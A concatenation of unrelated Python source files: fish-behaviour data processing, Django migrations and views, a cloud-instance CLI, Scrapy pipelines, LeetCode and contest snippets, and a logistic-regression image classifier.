                bout_end_fish_accumulated_orientation = data[f"bouts_end_stimulus_{stim:03d}"][
                    "fish_accumulated_orientation"]

                heading_angle_changes = bout_end_fish_accumulated_orientation - bout_start_fish_accumulated_orientation

                # Turn responses to left-ward motion the other way around so
                # stimuli 0-3 and 4-7 can be pooled as stim % 4.
                if stim in [0, 1, 2, 3]:
                    heading_angle_changes = -heading_angle_changes

                # Start at 1: the inter-bout interval needs a previous bout.
                # (Loop variable renamed from `i`, which shadowed the fish index.)
                for j in range(1, len(bout_times)):
                    all_data.append([fish_ID,
                                     genotype,
                                     trial,
                                     stim % 4,
                                     bout_times[j],
                                     bout_xs[j],
                                     bout_ys[j],
                                     bout_times[j] - bout_times[j - 1],
                                     heading_angle_changes[j],
                                     np.sign(heading_angle_changes[j]) == np.sign(heading_angle_changes[j - 1])])

    df = pd.DataFrame(all_data, columns=["fish_ID",
                                         "genotype",
                                         "trial",
                                         "stim",
                                         "bout_time",
                                         "bout_x",
                                         "bout_y",
                                         "inter_bout_interval",
                                         "heading_angle_change",
                                         "same_as_previous"]).astype(dtype={"trial": "int64",
                                                                            "stim": "int64",
                                                                            "same_as_previous": "bool"}, copy=False)
    df.set_index(['fish_ID', "genotype", 'trial', 'stim'], inplace=True)
    df.sort_index(inplace=True)
    df.to_hdf(root_path / experiment / "all_data.h5", key="all_bouts", complevel=9)

    # Extract behavioral features
    df_extracted_features, df_extracted_binned_features, \
        df_extracted_binned_features_same_direction, \
        df_extracted_binned_features_heading_angle_change_histograms, \
        df_extracted_binned_features_inter_bout_interval_histograms, \
        df_gmm_fitting_results = get_fish_info(df)

    df_extracted_features.to_hdf(root_path / experiment / "all_data.h5", key="extracted_features", complevel=9)
    df_extracted_binned_features.to_hdf(root_path / experiment / "all_data.h5", key="extracted_binned_features", complevel=9)
    df_extracted_binned_features_same_direction.to_hdf(root_path / experiment / "all_data.h5", key="extracted_binned_features_same_direction", complevel=9)
    df_extracted_binned_features_heading_angle_change_histograms.to_hdf(root_path / experiment / "all_data.h5", key="extracted_binned_features_heading_angle_change_histograms", complevel=9)
    df_extracted_binned_features_inter_bout_interval_histograms.to_hdf(root_path / experiment / "all_data.h5", key="extracted_binned_features_inter_bout_interval_histograms", complevel=9)
    df_gmm_fitting_results.to_hdf(root_path / experiment / "all_data.h5", key="gmm_fitting_results", complevel=9)
|
# Generated by Django 2.2.10 on 2020-08-03 07:17
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated migration.  The DateField defaults below are frozen to
    # the moment `makemigrations` ran (2020-08-03 07:17 UTC); they are NOT
    # evaluated per row.  NOTE(review): if a "current date" default was
    # intended, the model should use a callable (e.g. datetime.date.today)
    # instead -- confirm against the model definition.

    dependencies = [
        ('school', '0035_auto_20200803_1232'),
    ]

    operations = [
        migrations.AlterField(model_name='attendance', name='date', field=models.DateField(default=datetime.datetime(2020, 8, 3, 7, 17, 35, 877693, tzinfo=utc)),),
        migrations.AlterField(model_name='wastage', name='date', field=models.DateField(default=datetime.datetime(2020, 8, 3, 7, 17, 35, 875648, tzinfo=utc)),),
    ]
|
# Generated by Django 3.0.5 on 2020-05-09 10:45
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: drops visit.med_result and recreates it as a
    # ManyToManyField to med_result.MedResult.
    # NOTE(review): RemoveField discards the old column and any data it held;
    # confirm no data migration is needed before deploying.

    dependencies = [
        ('med_result', '0005_auto_20200509_1038'),
        ('visit', '0009_auto_20200509_1242'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='visit',
            name='med_result',
        ),
        migrations.AddField(
            model_name='visit',
            name='med_result',
            field=models.ManyToManyField(blank=True, to='med_result.MedResult'),
        ),
    ]
|
from django.contrib import admin
from django.urls import path,include
from django.conf import settings
from django.conf.urls.static import static
from two_factor.urls import urlpatterns as tf_urls
from django.conf.urls import url
from two_factor.gateways.twilio.urls import urlpatterns as tf_twilio_urls
#Custom admin page header
admin.site.site_header = 'Photoshop Battles Admin'

urlpatterns = [
    # Two-factor auth routes are mounted at the root prefix; they are
    # matched before the application routes below.
    url(r'', include(tf_twilio_urls)),
    url(r'', include(tf_urls)),
    path('admin/', admin.site.urls),
    path('',include('application.urls',namespace='application')),
    path('',include('accounts.urls'))
]

# Serve user-uploaded media through Django only during development.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
from django.shortcuts import render , redirect
from .models import Profile
from .forms import ProfileForm
from django.http import Http404
from django.contrib.auth import get_user_model
# Create your views here.
User = get_user_model()
def update_profile_view(request, *args, **kwargs):
    """Show and process the profile-edit form for the logged-in user.

    Copies first/last name and email from the form onto the User record and
    saves the remaining fields (bio, location) on the related Profile.
    Anonymous visitors are redirected to the login page.
    """
    if not request.user.is_authenticated:
        return redirect("/login?next=/profile/update/")
    user = request.user
    # Pre-fill the form with the account fields that live on User, not Profile.
    user_data = {
        "first_name" : user.first_name,
        "last_name" : user.last_name,
        "email" : user.email
    }
    profile = user.profile
    # `request.POST or None` keeps the form unbound on GET requests.
    form = ProfileForm(request.POST or None , instance = profile, initial = user_data)
    if form.is_valid():
        # commit=False applies the cleaned data to `profile` without hitting
        # the database yet; the explicit profile.save() below persists it.
        form.save(commit = False)
        first_name = form.cleaned_data.get('first_name')
        last_name = form.cleaned_data.get('last_name')
        email = form.cleaned_data.get('email')
        user.first_name= first_name
        user.last_name = last_name
        user.email = email
        user.save()
        profile.save() # bio and location
        return redirect("/")
    context = {
        'form' : form,
        'btn_label' : 'update profile',
        'title' : 'Update Profile'
    }
    return render(request , "profiles/updateProfile.html", context)
def profile_detail_view(request, username, *args, **kwargs):
    """Render the profile page for *username*; 404 when no such profile exists."""
    profile_qs = Profile.objects.filter(user__username=username)
    if not profile_qs.exists():
        raise Http404
    profile_obj = profile_qs.first()
    # Anonymous visitors never "follow"; otherwise check membership in the
    # profile's follower set.
    is_following = (
        request.user.is_authenticated
        and request.user in profile_obj.followers.all()
    )
    context = {
        "username": username,
        "profile": profile_obj,
        "is_following": is_following,
    }
    return render(request, "profiles/profileDetail.html", context)
|
import typer
import pyodk
import logging
from pyodk.rest import ApiException
import configparser
import sys
import click
import time
import progressbar
import subprocess
from oktawave_cli.lib.oci import OciHelper
from oktawave_cli.lib.subregion import SubregionHelper
from oktawave_cli.lib.tickets import TicketHelper
from oktawave_cli.common import Api
from oktawave_cli.utils import pretty_print_output, show_progress_from_ticket
logger = logging.getLogger(__name__)  # module-level logger

# Click decorator that creates (ensure=True) and injects the shared Api
# object into every command below.
pass_api = click.make_pass_decorator(Api, ensure=True)


@click.group()
@pass_api
def oci(api):
    """Manage Oktawave Cloud Instances"""
@oci.command("list")
@pass_api
def oci_list(api):
    """Gets OCI list."""
    oci_helper = OciHelper(api.api_client)
    column_names = ["Name", "ID", "Status", "IP", "Class"]
    # One table row per instance, in the order returned by the API.
    rows = [
        [inst.name, inst.id, inst.status.label, inst.ip_address, inst.type.label]
        for inst in oci_helper.get_oci_list()
    ]
    pretty_print_output(column_names, rows)
@oci.command("get")
@click.option("--name", help="Name of instance")
@click.option("--oci-id", type=int, help="Id of instance")
@pass_api
def oci_get(api, name, oci_id):
    """Get OCI."""
    # Look up a single OCI either by numeric id (exact) or by name (search).
    column_names = ["Name", "ID", "IP", "Class"]
    if not name and not oci_id:
        click.echo("You must provide name or id of oci")
        return -1
    oci_helper = OciHelper(api.api_client)
    if oci_id:
        instance = oci_helper.get_oci_by_id(oci_id)
        instance_data = [[instance.name, instance.id, instance.ip_address,
                          instance.type.label]]
        pretty_print_output(column_names, instance_data)
        return 0
    instances = oci_helper.get_oci(oci_name=name)
    if instances:
        # Name search only yields (name, id) pairs, so only the first two
        # header columns are populated.  (Removed a redundant second
        # `output = []` initialization.)
        output = [[instance.name, instance.id] for instance in instances]
        pretty_print_output(column_names, output)
    else:
        click.echo(f"Could not find instance with name: {name}")
@oci.command("types")
@pass_api
@click.option("--order-by", default="CPU",
              help="Available orders are: Category, Cpu, Ram, Name. Default=CPU")
def get_oci_types(api, order_by):
    """Print available OCI types(class)."""
    column_names = ["Name", "ID", "CPU", "RAM", "Category"]
    oci_helper = OciHelper(api.api_client)
    order_key = order_by.lower()
    if order_key not in ('cpu', 'ram', 'name', 'category', 'none'):
        click.echo("You can order only by: CPU, RAM, Name, Category or None")
        # BUG FIX: previously the invalid value was still forwarded to the
        # helper after printing the error.
        return -1
    # 'none' means unsorted; otherwise pass the requested key through.
    returned_types = oci_helper.get_instances_types(
        order_by=None if order_key == 'none' else order_by)
    output = []
    for oci_type in returned_types:
        output.append([oci_type.name, oci_type.id,
                       oci_type.cpu, oci_type.ram,
                       oci_type.category.label])
    pretty_print_output(column_names, output)
@oci.command("templates")
@pass_api
def templates_list(api):
    """List of available templates."""
    columns = ['Name', 'ID', 'System Category', "Owner Account"]
    oci_helper = OciHelper(api.api_client)
    # One table row per template returned by the API.
    rows = [
        [tpl.name, tpl.id, tpl.system_category.label, tpl.owner_account]
        for tpl in oci_helper.get_templates()
    ]
    pretty_print_output(columns, rows)
@oci.command("create")
@pass_api
@click.option("--name", help="Name for created OCI", required=True)
@click.option("--template-id", type=int, help="Template id", required=True)
@click.option("--authorization-method", default="ssh", help="Authorization method. SSH or Password")
@click.option("--disk-class", help="Type 48 for Tier1, 49 for Tier2, 50 for Tier3, 895 for Tier4, 896 for Tier5")
@click.option("--disk-size", type=int, help="Initial disk size")
@click.option("--ip-address-id", help="Public IP id. Create OCI with given ip")
@click.option("--ssh-key", help="IDs of ssh keys", multiple=True)
@click.option("--subregion", help="Subregion name in which create OCI for example: PL-001")
@click.option("--type-id", default=1047, type=int, help="Instance Type")
@click.option("--init-script", help="Location of puppet manifiest to send to OCI")
@click.option("--without-publicip", is_flag=True, help="Create OCI whitout public IP")
@click.option("--count", type=int, help="Count of instances to create")
def oci_create(api, name, template_id, authorization_method,
               disk_class, disk_size, ip_address_id, ssh_key, subregion, type_id,
               init_script, without_publicip, count):
    """Create OCI."""
    # TODO(review): disk_class, ip_address_id and init_script are accepted
    # but not forwarded to the API yet.
    args_dict = {}
    method = authorization_method.lower()
    if method == 'ssh' and not ssh_key:
        click.echo("You need provide ssh-keys to add")
        sys.exit(-1)
    # BUG FIX: ip_address_id defaults to None, so the old `!= 0` comparison
    # was always true and --without-publicip alone triggered this error.
    if without_publicip and ip_address_id:
        click.echo("Bad options, don't use --without-publicip flag with --ip-address")
        sys.exit(-1)
    if method == 'ssh':
        # 1398/1399 are the Oktawave dictionary ids for ssh-key / password
        # authorization -- presumably from the API docs; confirm there.
        authorization_method_id = 1398
        args_dict['ssh_keys_ids'] = list(ssh_key)
    elif method == 'password':
        authorization_method_id = 1399
    else:
        # BUG FIX: an unrecognized method previously left
        # authorization_method_id unbound and crashed with NameError below.
        click.echo("Authorization method must be SSH or Password")
        sys.exit(-1)
    args_dict['authorization_method_id'] = authorization_method_id
    # find subregion
    if subregion:
        subregion_name = subregion.lower()
        subregion_helper = SubregionHelper(api.api_client)
        api_subregions = subregion_helper.get_subregions()
        found = False
        for api_subregion in api_subregions.items:
            if api_subregion.name.lower() == subregion_name:
                found = True
                if not api_subregion.is_active:
                    click.echo("Given subregion is not active")
                    sys.exit(-1)
                args_dict['subregion_id'] = api_subregion.id
        if not found:
            click.echo(f"There is no such subregion: {subregion}")
            sys.exit(-1)
    # set disk size
    if disk_size:
        args_dict['disk_size'] = disk_size
    if type_id:
        args_dict['type_id'] = type_id
    if count:
        args_dict['instances_count'] = count
    args_dict['template_id'] = template_id
    oci_helper = OciHelper(api.api_client)
    resp = oci_helper.create_oci(name, **args_dict)
    if not resp:
        click.echo("Problem with creating OCI")
        sys.exit(-1)
    ticket_helper = TicketHelper(api.api_client)
    click.echo("Creating OCI in progress...")
    show_progress_from_ticket(resp, ticket_helper)
    # Ticket status 137 == error (status ids from the Oktawave ticket API).
    ticket = ticket_helper.get_ticket(resp.id)
    if ticket.status.id == 137:
        click.echo("Error while creating OCI")
    else:
        click.echo("Successful created OCI")
@oci.command("reboot")
@pass_api
@click.option("--id", 'oci_id', type=int, help="Id of OCI")
@click.option("--force", is_flag=True, help="Reboot without confirm")
def oci_reboot(api, oci_id, force):
    """Will try to soft(warm) reboot OCI."""
    # BUG FIX: the old guard was `if not id:`, which tested the *builtin*
    # id() function (always truthy), so a missing --id was never caught and
    # the command crashed later; also --force lacked is_flag and required a
    # value, contradicting its help text.
    if oci_id is None:
        click.echo("You need to provide OCI id.")
        sys.exit(-1)
    oci_helper = OciHelper(api.api_client)
    instance = oci_helper.get_oci_by_id(oci_id=oci_id)
    if not force:
        if not click.confirm(f"Are you really want to reboot OCI {instance.name}?"):
            click.echo("Aborting")
            sys.exit(-1)
    resp = oci_helper.reboot_oci(oci_id=oci_id)
    if resp:
        ticket_helper = TicketHelper(api.api_client)
        ticket_id = resp.id
        ticket = ticket_helper.get_ticket(ticket_id)
        with click.progressbar(length=100) as progress_bar:
            click.echo("Rebooting OCI in progress...")
            # Poll until the ticket leaves the "in progress" state (135).
            while ticket.status.id == 135 and ticket.progress != 100:
                ticket = ticket_helper.get_ticket(ticket_id)
                progress_bar.update(ticket.progress)
        # 136 == finished successfully.
        if ticket.status.id == 136:
            click.echo("Successful rebooted OCI")
        else:
            click.echo("Error while soft rebooting OCI.")
@oci.command("restart")
@pass_api
@click.option("--id", 'oci_id', type=int, help="Id of OCI")
@click.option("--name", 'oci_name', help="Name of OCI")
@click.option("--force", is_flag=True, help="Restart without confirm")
def oci_restart(api, oci_id, oci_name, force):
    """Hard restart OCI."""
    # BUG FIXES: the old guard `if not id:` tested the builtin id() (dead
    # code); the confirmation's answer was ignored so declining did not
    # abort; --name was wrongly declared type=int with the wrong help text.
    if oci_id is None:
        click.echo("You need to provide OCI id.")
        sys.exit(-1)
    # TODO(review): oci_name is accepted but not used yet (lookup by name
    # would go through OciHelper.get_oci).
    oci_helper = OciHelper(api.api_client)
    instance = oci_helper.get_oci_by_id(oci_id=oci_id)
    if not force:
        if not click.confirm(f"Are you really want to restart OCI {instance.name}?"):
            click.echo("Aborting")
            sys.exit(-1)
    resp = oci_helper.restart_oci(oci_id=oci_id)
    if resp:
        ticket_helper = TicketHelper(api.api_client)
        ticket_id = resp.id
        ticket = ticket_helper.get_ticket(ticket_id)
        with click.progressbar(length=100) as progress_bar:
            click.echo("Restarting OCI in progress...")
            # Poll until the ticket leaves the "in progress" state (135).
            while ticket.status.id == 135 and ticket.progress != 100:
                ticket = ticket_helper.get_ticket(ticket_id)
                progress_bar.update(ticket.progress)
        if ticket.status.id == 136:
            click.echo("Successful restarted OCI")
        else:
            click.echo("Error while soft restarting OCI.")
@oci.command("poweron")
@pass_api
@click.option("--id", 'oci_id', type=int, help="Id of OCI")
@click.option("--name", 'oci_name', help="Name of OCI")
def oci_poweron(api, oci_id, oci_name):
    """ PowerOn OCI."""
    # BUG FIX: the old guard `if not id:` tested the builtin id() and never
    # fired; a missing --id now aborts instead of crashing later.
    if oci_id is None:
        click.echo("You need to provide OCI id.")
        sys.exit(-1)
    oci_helper = OciHelper(api.api_client)
    resp = oci_helper.poweron_oci(oci_id=oci_id)
    if resp:
        ticket_helper = TicketHelper(api.api_client)
        ticket_id = resp.id
        ticket = ticket_helper.get_ticket(ticket_id)
        # Consistency: use click.progressbar like the other commands here
        # (previously the third-party progressbar module).
        with click.progressbar(length=100) as progress_bar:
            click.echo("Power on OCI in progress...")
            while ticket.status.id == 135 and ticket.progress != 100:
                ticket = ticket_helper.get_ticket(ticket_id)
                progress_bar.update(ticket.progress)
        if ticket.status.id == 136:
            click.echo("Successful powered on OCI")
        else:
            click.echo("Error while powering on OCI.")
@oci.command("poweroff")
@pass_api
@click.option("--id", 'oci_id', type=int, required=True, help="Id of OCI")
@click.option("--force", is_flag=True, help="Force poweroff OCI")
def oci_poweroff(api, oci_id, force):
    """ PowerOff OCI."""
    oci_helper = OciHelper(api.api_client)
    instance = oci_helper.get_oci_by_id(oci_id=oci_id)
    if not force:
        if not click.confirm(f"Are you really want to poweroff OCI {instance.name}?"):
            click.echo("Aborting")
            sys.exit(-1)
    # BUG FIX: this command previously called poweron_oci (copy/paste
    # error), powering the instance ON from the poweroff command.
    resp = oci_helper.poweroff_oci(oci_id=oci_id)
    if resp:
        ticket_helper = TicketHelper(api.api_client)
        ticket_id = resp.id
        ticket = ticket_helper.get_ticket(ticket_id)
        with click.progressbar(length=100) as progress_bar:
            click.echo("Poweroff OCI in progress...")
            # Poll until the ticket leaves the "in progress" state (135).
            while ticket.status.id == 135 and ticket.progress != 100:
                ticket = ticket_helper.get_ticket(ticket_id)
                progress_bar.update(ticket.progress)
        if ticket.status.id == 136:
            click.echo("Successful powered off OCI")
        else:
            click.echo("Error while powering off OCI.")
@oci.command("delete")
@pass_api
@click.option("--id", "oci_id", type=int, required=True, help="Id of OCI")
@click.option("--force", is_flag=True, help="Delete without confirm")
@click.option("--deep", is_flag=True, help="Delete OCI with all attached OVS")
def oci_delete(api, oci_id, force, deep):
    """Delete OCI."""
    if not force:
        if not click.confirm("Are you sure?"):
            click.echo("Aborting")
            sys.exit(-1)
    oci_helper = OciHelper(api.api_client)
    status = oci_helper.delete_oci(oci_id=oci_id, deep=deep)
    if not status:
        click.echo("Problem with deleting OCI.")
        sys.exit(-1)
    # CLEANUP: the old `if status: ... else: echo("Error...")` re-check was
    # dead code -- status is always truthy after the exit above.
    click.echo("Successful deleted OCI")
@oci.command("ssh")
@pass_api
@click.option("--id", "oci_id", type=int, required=True, help="Id of OCI")
@click.option("--login", help="Use login for connection")
def oci_ssh(api, oci_id, login):
    """Connect to OCI by ssh."""
    oci_helper = OciHelper(api.api_client)
    dns_name = oci_helper.get_dns_name(oci_id)
    if not dns_name:
        click.echo("Could not get DNS Name for OCI")
        sys.exit(-1)
    # BUG FIX: the --login option was accepted but ignored; it now selects
    # the remote user (default remains root, as before).
    user = login or "root"
    where = f"{user}@{dns_name}"
    # List form (shell=False) avoids shell interpretation of the target.
    subprocess.call(['ssh', where])
|
import json
import os
import yaml
def load_data(file_name):
    """Load <cwd>/configure/<file_name>.yml and return the parsed YAML data."""
    # Resolve the config file relative to the current working directory.
    file_path = os.getcwd() + os.sep + "configure" + os.sep + file_name + ".yml"
    # BUG FIX: the file handle was never closed, and yaml.load() without an
    # explicit Loader is deprecated and unsafe on untrusted input; use
    # safe_load inside a context manager instead.
    with open(file_path, 'r', encoding='utf-8') as file:
        data = yaml.safe_load(file)
    return data
if __name__ == '__main__':
    # Manual smoke test: parse configure/order_data.yml from the cwd.
    da = load_data("order_data")
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    """Bottom-up level-order traversal via recursive DFS bucketing."""

    def levelOrderBottom(self, root):
        """
        okay 56ms 80%
        :type root: TreeNode
        :rtype: List[List[int]]
        """
        self.lt = []
        self.traverse(root, 0)
        self.lt.reverse()
        return self.lt

    def traverse(self, node, level):
        """Append node.val into the bucket for *level*, recursing into children."""
        if node is None:
            return None
        if len(self.lt) == level:
            # First visit at this depth: open a new bucket.
            self.lt.append([])
        # Bucketing before or after the recursion yields the same per-level
        # order, since nodes of a level are always visited left-to-right.
        self.lt[level].append(node.val)
        self.traverse(node.left, level + 1)
        self.traverse(node.right, level + 1)
class Solution1(object):
    """Variant that guards child recursion with an `if` before the call."""

    def levelOrderBottom(self, root):
        """
        nice 52ms 91%
        Using if before calling a function
        :type root: TreeNode
        :rtype: List[List[int]]
        """
        self.lt = []
        if root is None:
            # Note: returns None (not []) for an empty tree.
            return None
        self.traverse(root, 0)
        self.lt.reverse()
        return self.lt

    def traverse(self, node, level):
        """Bucket node.val at *level*, then recurse into existing children only."""
        if len(self.lt) == level:
            self.lt.append([])
        self.lt[level].append(node.val)
        for child in (node.left, node.right):
            if child:
                self.traverse(child, level + 1)
# print Solution().levelOrderBottom()
#eof
|
import requests
import feedparser
from bs4 import BeautifulSoup
from alfheimproject.settings import CONFIG
def get_medium_posts():
    """Fetch the configured Medium user's RSS feed and return a list of post
    dicts (title, img_url, summary, published, link).

    Only posts whose inline image is hosted on the Medium CDN are kept.
    """
    page = requests.get("https://medium.com/feed/@{user}".format(user=CONFIG['api']['medium']['username']))
    rss = feedparser.parse(page.content)
    posts = []
    for post in rss.entries:
        soup = BeautifulSoup(post.summary, "html.parser")
        img = soup.find("img")
        paragraph = soup.find("p")
        # BUG FIX: soup.find() returns None when the tag is missing, which
        # previously raised TypeError; such posts are now skipped.
        if img is None or paragraph is None:
            continue
        img_url = img["src"]
        if "https://cdn-images-1.medium.com" not in img_url:
            continue
        posts.append({
            "title": post.title,
            "img_url": img_url,
            "summary": paragraph.text,
            "published": post.published,
            "link": post.link
        })
    return posts
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
class QiushibaikePipeline (object):
    """Scrapy pipeline writing author/text pairs to a local UTF-8 text file."""

    fp = None  # file handle; opened when the spider starts

    def open_spider(self, spider):
        # Runtime message kept verbatim ("spider starting").
        print('开始爬虫……')
        self.fp = open('./qiushi.txt','w',encoding='utf-8')

    def process_item(self, item, spider):
        author = item['author']
        page_text = item['page_text']
        print(author,page_text)
        record = ':'.join((author, page_text))
        self.fp.write(record)
        # Hand the item on to the next pipeline class.
        return item

    def close_spider(self,spider):
        # Runtime message kept verbatim ("spider finished").
        print('结束爬虫.')
        self.fp.close()
import pymysql
#管道文件中一个管道类将一组数据存储到一个平台或载体中
# One pipeline class stores one batch of data into one platform/medium.
class mysqlQiushibaikePipeline (object):
    """Scrapy pipeline persisting author/text pairs into a local MySQL table."""

    conn = None  # pymysql connection, opened when the spider starts
    cur = None   # cursor, (re)opened per item

    def open_spider(self, spider):
        # Runtime message kept verbatim ("start storing to database").
        print('开始存入数据库……')
        self.conn = pymysql.connect(host = '127.0.0.1',port=3306,user='root',password='root',db='python',charset='utf8')

    def process_item(self, item, spider):
        # Open a cursor for this item.
        self.cur = self.conn.cursor()
        try:
            # SECURITY FIX: build the query with DB-API parameter binding
            # instead of Python %-interpolation, which allowed SQL injection
            # through the scraped text.
            self.cur.execute('insert into qiushi VALUES (%s,%s)',
                             (item['author'], item['page_text']))
            self.conn.commit()
        except Exception as e:
            print(e)
            self.conn.rollback()
        # Hand the item on to the next pipeline class.
        return item

    def close_spider(self, spider):
        # Runtime message kept verbatim ("database storage finished").
        print('存入数据库完成.')
        self.cur.close()
        self.conn.close()
import sys
input = sys.stdin.readline  # fast input for competitive programming
sys.setrecursionlimit(10 ** 7)

# Input: k and n on one line, then n integers a[0..n-1].
# NOTE(review): from the arithmetic below this looks like a "travel around a
# circle of circumference k, skip the single largest gap" problem -- confirm
# against the original problem statement.
k, n = list(map(int, input().split()))
a = list(map(int, input().split()))
# diff[i] = gap between consecutive positions; the last entry closes the
# circle through the point k (== 0).
diff = [0] * n
for i in range(len(a) - 1):
    diff[i] = abs(a[i] - a[i+1])
diff[-1] = abs(a[-1] - k) + a[0]
# Total distance minus the largest gap (which is skipped).
print(k - max(diff))
|
def ais(a):
    """Print the comparison pattern between consecutive elements of *a*
    ('<', '=', '>'), then len(a), then the pattern length (len(a) - 1)."""
    pattern = []
    for left, right in zip(a, a[1:]):
        if left > right:
            symbol = '>'
        elif left < right:
            symbol = '<'
        else:
            symbol = '='
        pattern.append(symbol)
    print(pattern)
    print(len(a))
    print(len(pattern))
# Demo run; expected pattern: ['<', '<', '>', '<', '<'].
s = [40, 50, 60, 10, 20, 30]
ais(s)
|
import skimage
from lr_utils import load_dataset
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
"""
w.shape = (dim, 1)
X.shape = (px * px * 3, num_of_pic)
Y.shape = (1, ...)
"""
# Sigmoid activation function
def sigmoid(z):
    """Logistic function: map a scalar or ndarray z into (0, 1)."""
    denominator = 1 + np.exp(-z)
    return 1 / denominator
# Parameter initialization
def initialize_with_zeros(dim):
    """Return a (dim, 1) zero weight column vector and a scalar bias of 0."""
    return np.zeros((dim, 1)), 0
# Forward propagation
def propagate(w, b, X, Y):
    """One forward/backward pass of logistic regression.

    w: (dim, 1) weights; b: scalar bias; X: (dim, m) inputs; Y: (1, m) labels.
    Returns (cost, dw, db): mean cross-entropy cost and its gradients.
    """
    m = X.shape[1]
    A = sigmoid(np.dot(w.T, X) + b)
    residual = A - Y
    cost = -np.sum(np.dot(Y, np.log(A).T) + np.dot(1 - Y, np.log(1 - A).T)) / m
    dw = np.dot(X, residual.T) / m
    db = np.sum(residual) / m
    return cost, dw, db
# Gradient descent
def optimize(w, b, X, Y, num_iterations, learning_rate, print_cost=False):
    """Gradient-descent training loop for logistic regression.

    Returns (params, grads, costs): the final parameters, the gradients
    from the last step, and the cost sampled every 100 iterations (only
    when print_cost is True, mirroring the original behaviour).
    """
    costs = []
    for step in range(num_iterations):
        cost, dw, db = propagate(w, b, X, Y)
        # Rebind (rather than mutate in place) so callers' arrays survive.
        w = w - learning_rate * dw
        b = b - learning_rate * db
        if print_cost == True and step % 100 == 0:
            costs.append(cost)
    params = {"w": w, "b": b}
    grads = {"dw": dw, "db": db}
    return params, grads, costs
def predict(w, b, X):
    """Return (Y_predict, Y_possibility): 0/1 labels and raw sigmoid scores.

    A column is labeled 1 exactly when its sigmoid score exceeds 0.5.
    """
    Y_possibility = sigmoid(np.dot(w.T, X) + b)
    Y_predict = np.zeros((1, X.shape[1]))
    for col in range(X.shape[1]):
        Y_predict[0, col] = 1 if Y_possibility[0, col] > 0.5 else 0
    return Y_predict, Y_possibility
def training(X_train, Y_train, num_iterations=2000, learning_rate=0.5, print_cost=False):
    """Initialize zero parameters and fit them to the training set.

    Returns optimize()'s (params, grads, costs) triple.
    """
    w, b = initialize_with_zeros(X_train.shape[0])
    return optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)
def model(X_train, Y_train, X_test, Y_test, num_iterations=2000, learning_rate=0.5, print_cost=False):
    """Train logistic regression on the training set.

    X_test / Y_test are accepted for interface compatibility but are not
    evaluated here (yet).  Previously the trained parameters were computed
    and then silently discarded (the function returned None); they are now
    returned, matching training().

    Returns:
        (params, grads, costs) from optimize().
    """
    w, b = initialize_with_zeros(X_train.shape[0])
    params, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)
    return params, grads, costs
def loadAndformatSet():
    """Load the dataset and flatten each training image into one column.

    Returns (train_set_x, classes) where train_set_x has shape
    (px * px * 3, num_of_pic).  Note: unlike the __main__ path below, the
    pixel values are NOT scaled by 255 here.
    """
    train_x_orig, _train_y, _test_x_orig, _test_y, classes = load_dataset()
    flattened = train_x_orig.reshape(train_x_orig.shape[0], -1).T
    return flattened, classes
if __name__ == '__main__':
    # Load the cat/non-cat dataset, flatten images into columns, scale to [0, 1].
    train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()
    train_set_x = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T / 255
    test_set_x = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T / 255
    # num_px: images are assumed square (shape[1] == shape[2]) -- TODO confirm.
    num_px = train_set_x_orig.shape[1]
    params, grads, costs = training(train_set_x, train_set_y, num_iterations=2000, learning_rate=0.009, print_cost=False)
    # Show one test image as a sanity check.
    index = 1
    plt.imshow(test_set_x[:, index].reshape((num_px, num_px, 3)))
    plt.show()
    # my_image = "my_image.jpg"
    # Interactive loop: classify user-supplied images from the images/ folder.
    # NOTE(review): loops forever; a bad filename raises from plt.imread.
    while True:
        print("please enter the picture: ")
        my_image = input()
        fname = "images/" + my_image
        image = np.array(plt.imread(fname))
        # # , flatten = False
        #
        # Resize to the training resolution and flatten to a single column.
        my_image = skimage.transform.resize(image, output_shape=(num_px, num_px)).reshape((1, num_px * num_px * 3)).T
        # , size = (num_px, num_px)).reshape((1, num_px * num_px * 3)
        my_predicted_image, my_predicted_possibility = predict(params["w"], params["b"], my_image)
        print("y = " + str(np.squeeze(my_predicted_image)))
        print(my_predicted_image.squeeze())
        print("is a " + str(classes[int(np.squeeze(my_predicted_image))]))
        print("possibility : " + str(my_predicted_possibility))
        plt.imshow(image)
        im = Image.open(fname)
        # im.show()
        # im = plt.imread(fname)
        # plt.imshow(im)
        #
        # print("y = " + str(np.squeeze(my_predicted_image)) + ", your algorithm predicts a \"" + classes[
        #     int(np.squeeze(my_predicted_image)),].decode("utf-8") + "\" picture.")
        #
        plt.show()
|
import sys
import numpy as np
import pandas as pd
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix, precision_recall_fscore_support
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.ensemble import AdaBoostClassifier, GradientBoostingClassifier
from sklearn.multioutput import MultiOutputClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
# for loading sqllite data
from sqlalchemy import create_engine
#for Export model as a pickle file
import pickle
import nltk
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
nltk.download(['punkt', 'wordnet'])
nltk.download('averaged_perceptron_tagger')
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
def load_data(database_filepath):
    """
    Input:
        database_filepath: the path of the SQLite database
    Output:
        X : message features (Series)
        Y : target dataframe (one column per category)
        category_names : target label names (columns from index 4 on)
    Loads the 'DisaterResponsefinal' table and splits it into features,
    targets and label names.  (The unreachable `pass` after `return` was
    removed.)
    """
